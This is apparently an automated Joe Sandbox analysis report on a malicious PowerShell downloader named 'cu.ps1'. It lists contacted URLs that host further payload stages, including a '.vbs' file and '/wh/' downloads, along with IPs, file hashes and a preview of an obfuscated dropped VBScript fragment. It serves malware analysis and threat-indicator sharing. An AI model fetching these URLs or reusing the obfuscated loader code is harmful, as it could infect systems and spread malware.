          www.fornid.com | unknown | unknown | true | unknown
          www.almrwad.com | unknown | unknown | false | unknown
          www.erp-royal-crown.info | unknown | unknown | false | unknown
          Name | Malicious | Antivirus Detection | Reputation
          https://www.pineappletech.ae/na/mg.vbs | false | Avira URL Cloud: malware | unknown
          https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf | false | Avira URL Cloud: malware | unknown
          https://www.erp-royal-crown.info/wh/Subordinerendes78.smi | true | Avira URL Cloud: malware | unknown
          https://www.almrwad.com/wh/Subordinerendes78.smi | false | Avira URL Cloud: malware | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          https://www.almrwad.com/w | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.fornid.com/ordine | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.almrwad.com/wh/Subordine | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.almrwad.com/wh/Subordiner | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.fornid.com/wh/List | powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.microsoft.co | powershell.exe, 00000000.00000002.1737765751.0000022A2ADB0000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://www.almrwad.com/wh/Su | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.info/wh/Subordineren | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.erp-royal-crown.info/wh/Subordinerende | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.almrwad.com/ | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.info/wh/Subordinerend | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          http://www.erp-royal-crown.info | powershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.almrwad.c | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.info | powershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.fornid.com/90-maschere-per-saldatura | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1729316042.0000022A22C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1729316042.0000022A22DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547285590.000002A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EA9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.erp-royal-crown.info/wh/Subordine | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          http://www.pineappletech.ae | powershell.exe, 00000000.00000002.1669645213.0000022A14B84000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.fornid.com/133-occhiali-protettivi | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.i | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.fornid.com/themes/PRS070158/css/megnor/custom.css | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1669645213.0000022A12C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EA31000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.almrwad.com/wh/Subordin | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.info/wh/ | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.fornid.com/wh/List%20of%20rznvquirznvd%20itznvms%20and%20sznvrvicznvs.pdf | powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.info/wh/Subordinerendes78.smip | powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520341000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.almrwad.com/wh/Subordinerendes7 | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.almrwad.com/wh/Subord | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.fornid.com/contattaci | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://www.almrwad.com/wh/ | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.almrwad.com/wh/Subordinerendes | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://go.micro | powershell.exe, 00000000.00000002.1669645213.0000022A13852000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A601625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A60090A000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
          https://contoso.com/Icon | powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.almrwad.com | powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.fornid.com | powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A14706000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.almrwad.com/wh/Subordinerende | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.almrwad.com/wh/Subordinerendes78.s | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.almrwad.com/wh/Subordinerendes78.sm | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://www.fornid.com/ | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://almrwad.com | powershell.exe, 00000007.00000002.2653474547.000002251FAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.fornid.com/144-filtri-per-maschere | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.almrwad.com/wh/Subordinerendes78 | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.info/wh/Subord | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3 | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.info/w | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.erp-royal-crown. | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://fornid.com | powershell.exe, 00000000.00000002.1669645213.0000022A1470B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.info/wh/Subordinere | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.erp-royal-crown.info/wh | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.fornid.com/sitemap | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.fornid.com/145-maschere-antigas | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://contoso.com/License | powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.almrwad.com/wh/Subordinerend | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.info/wh/Subordi | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.erp-royal-crown.info/wh/Subor | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          https://www.fornid.com/il-mio-account | powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.info/wh/Subo | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          http://www.almrwad.com | powershell.exe, 00000007.00000002.2653474547.000002251FAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.almrwad.com/wh/Subordinere | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.erp-royal-crown.in | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://go.micros | powershell.exe, 00000003.00000002.1530508582.000002A60090A000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.almrwad.com/wh/Subordi | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.almrwad.co | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.almrwad.com/wh/Subordinerendes78. | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://erp-royal-crown.info | powershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
          https://www.erp-royal-crown.info/wh/Subordinerendes | powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing |
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.pinznvapplznvtznvch.aznv/na/mg.vbspowershell.exe, 00000000.00000002.1669645213.0000022A14AA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.erp-royal-crown.info/wh/Subordinerendes78.spowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://www.fornid.com/img/logo.jpgpowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.almrwad.com/whpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.almrwad.com/wh/Subpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.erp-royal-crown.info/wh/Subordinpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://www.almrwad.com/wh/Subopowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://blog.fornid.com/powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1729316042.0000022A22C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1729316042.0000022A22DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547285590.000002A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EA9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.erp-royal-crown.info/wh/Subordinerendes78powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      http://www.fornid.com/content/13-international-shipmentspowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.almrwad.com/wh/Suborpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.almrwad.powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.1530508582.000002A601625000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jspowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.erp-royal-crown.info/wh/Su0powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          https://www.erp-royal-crown.info/wh/Subordinerendes7powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          http://www.fornid.compowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1470B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.fornid.com/cercapowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.erp-royal-crown.info/powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          https://www.almrwad.com/wh/Subordinerenpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
IP               Domain                 Country        ASN    ASN Name         Malicious
91.193.42.13     www.pineappletech.ae   Belgium        48694  ITFPL            false
93.95.216.175    fornid.com             Italy          52030  SERVERPLAN-ASIT  true
148.251.114.233  erp-royal-crown.info   Germany        24940  HETZNER-ASDE     false
184.171.244.231  almrwad.com            United States  33182  DIMENOCUS        false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1568998
Start date and time: 2024-12-05 10:38:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cu.ps1
Detection: MAL
Classification: mal100.expl.evad.winPS1@11/13@4/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 15
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7372 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7584 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8008 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: cu.ps1
Time      Type             Description
04:39:10  API Interceptor  1519804x Sleep call for process: powershell.exe modified
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines (316), with CRLF line terminators
Category: dropped
Size (bytes): 29287
Entropy (8bit): 5.16757071229696
Encrypted: false
SSDEEP: 768:5Yf48SKT1nPeL9GLfqAQnS71KcNrx182u+:504lKT1P0yfqAuiNbtu+
MD5: 8DF76AF54C38D5D4C2CD9F6D18EEDF92
SHA1: B21C95EBF34440AD8DA30F6E4FE25BADB871D61A
SHA-256: 2FD9440E21ADF91473719E9FB085F4D47A1D5AFCF02333A7F04D2A0F4D0B1C77
SHA-512: 8DBBDBC575A292890F1B1BB8AEDA916A958225B11739075B447AE7CE64774C678C45B071F0FBB91460BB218409E026ECFCF05740DAD8EB059B773C990D57FB09
Malicious: true
Reputation: low
                                                                          Preview:......Function Seasoning(Ambrain)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Seasoning = ChrW(Ambrain)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirerne xor clng(6932161) ...... ..Sorting137 = 0.... ..Pinligstes= array(65+5+0,69,77,59,72,73,62,59,66,66)......Kopvisdislocatedavic = Log(Len("Frihedsbevgelserne"))....Private Const Kbesum = 49485..Private Const Cornbird = 16348..Private Const Nyderes = "Pandaer verificative133 knopskydning,"..Private Const Terrorize = "Postansvarlige skjorternes"..Private Const Danseorkesteret = "Myndigstes150 exculpate trykkeriers puromucous"..Private Const Unignorant = &HF76C..Private Const Iodinophilous = -9045..Private Const Polyautography = 22989..Private Const Divisibly = -6735..Private Const Takeups = &H8FE6..Private Const Inductance = &H59DF..Private Const Thorax64 = -13300..Private Const Forkiness = &H96C8..Private Const Kondensatorers147 =
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.890472898059848
                                                                          Encrypted:false
                                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulL4w/l/lZ:NllUMwl/
                                                                          MD5:5E4245540CA0496B6A4E15149DB9B371
                                                                          SHA1:6F912443CDFD9F0C474E2ACC755E982C5E3CF8BB
